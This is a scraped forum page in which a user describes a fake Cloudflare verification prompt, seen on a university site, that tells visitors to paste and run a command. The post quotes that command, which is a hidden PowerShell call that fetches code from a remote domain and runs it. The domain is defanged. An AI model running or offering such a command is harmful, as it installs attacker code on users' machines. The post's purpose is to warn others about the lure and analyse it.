TE
TechEcho
Home24h TopNewestBestAskShowJobs
GitHubTwitter
Home

TechEcho

A tech news platform built with Next.js, providing global tech news and discussions.

GitHubTwitter

Home

HomeNewestBestAskShowJobs

Resources

HackerNews APIOriginal HackerNewsNext.js

© 2025 TechEcho. All rights reserved.

Is this a new attack vector?

3 pointsby archon81019 days ago

1 comment

archon81019 days ago
Has this phishing&#x2F;infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I&#x27;ve never seen before (image in linked tweet).<p>When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?<p>Win+R (run prompt), Ctrl+V (paste), Enter (execute).<p>What are we executing? This (I replaced . with [DOT]): powershell -w h &quot;curl bronxy[DOT]cc&#x2F;sign&#x2F;in|iex&quot;<p>Threat actors often use the &quot;iex&quot; command for their ability to launch both local and remote payloads. I curled the url, and for me, it showed a Teams exe from MS (VirusTotal here: <a href="https:&#x2F;&#x2F;virustotal.com&#x2F;gui&#x2F;url&#x2F;fb9945173e557129d38ccdf204622458b2a3e0a1897a0379d9bc1b85faf13c1e" rel="nofollow">https:&#x2F;&#x2F;virustotal.com&#x2F;gui&#x2F;url&#x2F;fb9945173e557129d38ccdf204622...</a>), but I wonder if the response switches to something malicious sometimes.